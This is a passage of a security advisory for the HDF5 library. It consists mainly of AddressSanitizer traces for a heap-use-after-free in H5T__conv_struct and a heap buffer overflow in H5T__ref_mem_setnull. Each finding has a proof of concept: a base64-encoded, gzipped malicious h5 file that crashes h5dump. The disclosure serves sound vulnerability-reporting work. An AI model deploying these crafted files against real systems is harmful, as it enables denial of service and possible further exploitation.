    #23 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x558ffe8e2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x558ffe8db1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

previously allocated by thread T0 here:
    #0 0x7f7910f06e8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7f79106b02ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7f79106b14f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7f7910590dd4 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1468
    #4 0x7f791059341b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7f791059341b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x558ffe91546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x558ffe92a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x558ffe8e3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x558ffe8ec947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x558ffe8e2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x558ffe8db1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0fefa15020b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa15020f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fefa1502100: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502110: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502120: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fefa1502150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1205==ABORTING

H5T__conv_struct Use After Free

Details

The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.

PoC

The following PoC shows the ASAN output detailing the use-after-free condition.

$ echo "H4sICP8/v2QAAzExMDQ5YTU2YTQyMzUwOTNlNjg0NWEyNzAyMWFmMTVlAOv0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcqHyY/A4mJMUMTxnQgYerYwCINoDyFaB0AxuGUqj5EDokyNWVgYERbh+6vRasEJoDuzHopn4mStmgAPX4JNnp5Qp08J+wEroCRgYmBkYWRHoSBKZbRiA9A8pPwFDPBpLnACsCAgEgBIEN0HSYwQhTBxFnhPL/MUBihA8qbmQABKaGloamJiamhiADJcBGMjKByAf/f0AzDyhDQdw2gXLP4gCYuY1c8MHescEYSJ84BMROAY3M0GBqsIfIP7B3mo2QN5huzADJ9g0OoWBw1d4ZzIfIg+QgwSDgCNF/wd4FSR4U5CwQ/Y6zZoLASXtXNP2Q7H3CEWL+UXs3JHkQCxJtAk6TVDyB6JC9O0w+5YQTyG5IRnFxgth/wN4DIm8Lsx9SbjQ4yRwvBKI99p5o9nOC+YucIO7bae+FJK8JLH6C/fxdGIGhBCt/XqCUg1QEDTQyl86An4C8Y1FRYqV/WnBJUWlySWlRajFUHJoNobkPlK4SwFlTDJiAgJHJkBifl5ibSth+AW1YmlNgSILqYSGgR1BBHq5HnINBHFQOJEP1Eqp3BBXsoWocGEy4GUxFgYkyBapXAF2xPAqPUQyYlnhAdmUkFqF6D38pLAzS3AUME1BYAjXCAg/kB0YkdeCkWo8wS1BeHmwfsj8BV7IhBxgIAAA=" | base64 -d | gunzip -c > 11049a56a4235093e6845a27021af15e 
$ ./hdf5/bin/h5dump 11049a56a4235093e6845a27021af15e 
HDF5 "11049a56a4235093e6845a27021af15e" {
GROUP "/" {
   DATASET "ArrayOfStructures" {
      DATATYPE  H5T_COMPOUND {
         32-bit big-endian integer 32-bit precision "a_name";
         H5T_IEEE_F32LE "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 35329;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            H5T_ARRAY { [2] 96-bit big-endian floating-point 32-bit precision } "array_na";
         } "d_name";
      }
      DATASPACE  SIMPLE { ( 545460846846 ) / ( 545460846846 ) }
=================================================================
==1167==ERROR: AddressSanitizer: heap-use-after-free on address 0x7fae4edbcec4 at pc 0x7fae5549f541 bp 0x7fffb9b82400 sp 0x7fffb9b81bb0
READ of size 35329 at 0x7fae4edbcec4 thread T0
    #0 0x7fae5549f540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7fae54ff94dd in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2314
    #2 0x7fae54fc687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7fae54ff9b02 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2339
    #4 0x7fae54fc687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7fae54ba8b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7fae54b66221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7fae54b9c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x55beb9eaf46c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x55beb9ec418d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x55beb9e7dc9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x55beb9e86947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x55beb9e7cbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x55beb9e751c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x55beb9e77649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7fae4edbcec4 is located 800452 bytes inside of 1048584-byte region [0x7fae4ecf9800,0x7fae4edf9808)
freed by thread T0 here:
    #0 0x7fae5550fb6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
    #1 0x7fae54cb7d3e in H5FL__blk_gc_list /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1203
    #2 0x7fae54cb9b07 in H5FL_blk_free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1067
    #3 0x7fae54b9aaa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1505
    #4 0x7fae54b9aaa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1494
    #5 0x7fae54b9aaa7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:430
    #6 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x55beb9eaf46c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x55beb9ec418d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x55beb9e7dc9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x55beb9e86947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x55beb9e7cbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x55beb9e751c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

previously allocated by thread T0 here:
    #0 0x7fae5550fe8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x7fae54cb92ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
    #2 0x7fae54cba4f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
    #3 0x7fae54b99dd4 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1468
    #4 0x7fae54b9c41b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
    #5 0x7fae54b9c41b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
    #6 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x55beb9eaf46c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x55beb9ec418d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x55beb9e7dc9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x55beb9e86947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #23 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #24 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #25 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #26 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #27 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #28 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #29 0x55beb9e7cbe4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #30 0x55beb9e751c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #31 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
  0x0ff649daf980: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf990: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0ff649daf9d0: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0ff649daf9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649daf9f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649dafa00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649dafa10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0ff649dafa20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1167==ABORTING

Heap Buffer Overflow

Summary

An attacker who can control an h5 file parsed by HDF5 can trigger write-based heap buffer overflow conditions. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflows against modern operating systems. Real-world exploitability of these issues in terms of remote-code execution is currently unknown.

H5T__ref_mem_setnull Heap Buffer Overflow

Details

The following write-based heap overflow was found by fuzzing the h5dump and h5stat helper utilities. An attacker who can supply a malicious h5 file can trigger an out-of-bounds write in the H5T__ref_mem_setnull method. As the H5T__ref_mem_setnull method is responsible over-writing target buffers with null bytes, the likelihood of exploitability for remote-code-execution is reduced.

PoC

The following snippet details the PoC testcase and address sanitizer output:

$ echo "H4sIAAAAAAAAA+v0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRcE4PwPID5MfgGyYizAw9UxAMxghPAjoOINaOpcEksSi1NLDPUMUPhGaHxjNL4JLj7UOoYV+J034CAkyNUV5Nr/aAAm/4AFQnvQwzH1JKpnoYkraAEUBtoBeMB/fJKMDEzgtKwA5QsC8ycjMJ4aoAk8AUM9KyTtQ+WZGSTATEkgAcrCAhywaAObqMzIAMnYjFD1sChVgYobGRgYAqGxoaWpiYkZsIiAmsfIBNXAgdAnAKY7wHwBYnxOfXAXXSDYz98FFCZQZzJcIFBeWUBpDTb86jSgdAAHXmVw8xI48auD5e8CLtxqGiAUO36TaANQ0tUbULoSADPR0hMDrvTER2R6cuBA1UcVACxPX1DTPKIBUbngPVJxTwBAQmUCuc6hGsDtZFzlj6CCPDydiHMwiNfD1VOWXgIEEPogejuo4UGqAczwUAAztRggqQPEhvkZOS9RGi4JSOECYTbQwnsEQQIaH1f6UBfCWj9RHA4k1k8U1x8SUHqg6o/R/AMCIzD/YG/f0Tv/kAqGfH7D116DggFpr5EK/v8baBdQBwAA5dxHINAQAAA=" | base64 -d | gunzip -c > 0e71c9cac751ed2550aee102e2956181 
$ ./hdf5/bin/h5dump 0e71c9cac751ed2550aee102e2956181 
HDF5 "0e71c9cac751ed2550aee102e2956181" {
GROUP "/" {
   DATASET "Dataset1.0" {
      DATATYPE  H5T_STRING {
         STRSIZE H5T_VARIABLE;
         STRPAD H5T_STR_NULLTERM;
         CSET H5T_CSET_ASCII;
         CTYPE unknown_one_character_type;
      }
      DATASPACE  SIMPLE { ( 4 ) / ( 4 ) }
      DATA {h5dump error: unable to print data

      }
=================================================================
==1090==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000005b40 at pc 0x7f4b61c17269 bp 0x7ffff0d71450 sp 0x7ffff0d70c00
WRITE of size 64 at 0x602000005b40 thread T0
    #0 0x7f4b61c17268 in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778
    #1 0x7f4b61881782 in H5T__ref_mem_setnull /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394
    #2 0x7f4b6177984f in H5T__conv_ref /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3758
    #3 0x7f4b6173e87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #4 0x7f4b6130e117 in H5D_get_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dint.c:3667
    #5 0x7f4b618ca8a4 in H5VL__native_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:466
    #6 0x7f4b6189bcfa in H5VL__dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2426
    #7 0x7f4b6189bcfa in H5VL_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2457
    #8 0x7f4b6128f1e6 in H5Dget_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:776
    #9 0x5568d72ae733  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29733)
    #10 0x5568d72b7947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #11 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #12 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #13 0x7f4b61484212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #14 0x7f4b611fe721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #15 0x7f4b6120205e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #16 0x7f4b61492c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #17 0x7f4b6148b3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #18 0x7f4b61475d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #19 0x7f4b6152dc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #20 0x7f4b618d5455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #21 0x7f4b618ac095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #22 0x7f4b618ac095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #23 0x7f4b6151961a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #24 0x7f4b6151961a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
